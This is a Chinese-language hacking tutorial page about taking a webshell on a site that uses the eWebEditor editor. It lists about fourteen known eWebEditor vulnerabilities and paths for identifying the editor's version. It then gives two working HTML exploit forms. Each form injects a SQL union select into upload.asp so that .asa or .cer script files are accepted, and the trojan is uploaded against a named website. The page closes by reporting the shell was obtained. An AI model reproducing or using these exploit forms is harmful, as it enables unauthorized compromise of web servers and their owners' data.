利用【ewebeditor漏洞】巧妙拿webshell_安琪教程网

黑客教程

利用【ewebeditor漏洞】巧妙拿webshell

时间:2018/10/12 9:46:10 作者:安琪 来自:www.aqfls.com 浏览:456 评论:0
内容摘要:利用【ewebeditor漏洞】巧妙拿webshell朋友发了个后台让帮忙拿shell,网站采用的是ewebeditor编辑器于是开始考虑一下漏洞是否存在:1.ewebeditor2.16版突破上传目录无脚本执行权限exp2.ewebeditor1.00版-2.16版upload.asp注入漏洞控制上传文件exp,突破...
利用【ewebeditor漏洞】巧妙拿webshell
利用【ewebeditor漏洞】巧妙拿webshell

朋友发了个后台让帮忙拿shell,

网站采用的是ewebeditor编辑器

于是开始考虑一下漏洞是否存在:

1.ewebeditor 2.16版突破上传目录无脚本执行权限exp

2.ewebeditor 1.00版-2.16版upload.asp注入漏洞控制上传文件exp,突破无脚本执行权限

3.ewebeditor可以上传asp、asa文件,但无上传按钮工具栏

4.ewebeditor 2.7.5 上传漏洞

5.ewebeditor 2.1.6 asp版用union select控制上传拿webshell

6.ewebeditor asp版 1.0.0 上传漏洞利用程序

7.ewebeditor绕过后台登陆漏洞(通杀低版本)

8.Spaw Editor v1.0至2.0远程文件上传漏洞

9.ewebeditor远程上传执行代码漏洞

10.eWebEditorNet 漏洞(aspx版漏洞)

11.ewebeditor asp版5.5-6.X解析漏洞0day

12.ewebeditor某些版本upload.asp文件注入漏洞

13.ewebeditor v2.7版以前所有版本注入漏洞 

14.ewebeditor 4.6精简版上传漏洞


如何查看ewebeditor的版本:

直接点开下面链接

ewebeditor编辑器查看版本信息

edit/dialog/about.html

ewebeditor/dialog/about.html

eweb/dialog/about.html

ewebedit/dialog/about.html

ewindoweditor/dialog/about.html

发现版本是eWebEditor 2.1.6 asp版 于是利用漏洞:

1.<H1>eWebEditor 2.1.6 asp版 上传漏洞利用程序----</H1><br><br>  
2.<form action="http://www.chouwazi.com/admin/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|asa',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">  
3.<input type=file name=uploadfile size=100><br><br>  
4.<input type=submit value=Fuck>  
5.</form>  


2.1.6 的直接用此 exp,这个是冰的原点写的
1.<HTML><HEAD><TITLE>ewebeditor的upload文件上传exp</TITLE><meta http-equiv="Content-Type" content="text/html; charset=gb2312"> </head><body bgcolor=orange>   
2.<tr>不是通杀,版本有区别!我就郁闷,落叶那JJ说文章没说清楚,这份EXP就是根据文章写出来的!落叶那家伙的EXP我看半天没看明白有啥区别!<br></tr>  
3.<tr>文件传到了uploadfile目录下了</tr><br>  
4.<tr>不知道算不算0day,我是冰的原点</tr><br>  
5.<tr>至于利用方法就是修改源文件中的action,然后传cer的马马就行了!</tr><br>  
6.<form action="http://chouwazi.com/ewebeditor/upload.asp?action=save&type=IMAGE&style=firefox'%20union%20select%20S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,%20[S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl%20from%20ewebeditor_style%20where%20s_name='standard'%20and%20'a'='a" method=post name=myform enctype="multipart/form-data"><input type=file name=uploadfile size=100 style="width:100%"><input type=submit value=传吧></form>  
不是通杀,版本有区别!如果下到数据库可以根据数据库进行修改!

最后成功拿shell...

标签:ewebeditor漏洞 


本站所有资源默认解压密码:www.aqfls.com 如有问题请联系管理员说明


本站资源仅供学习参考,所有资源均来源于网络搜索及网友提供,所有言论并不代表本站立场

投诉与建议 文章投稿 E-mail:1437232096@qq.com

相关文章
相关评论
加载中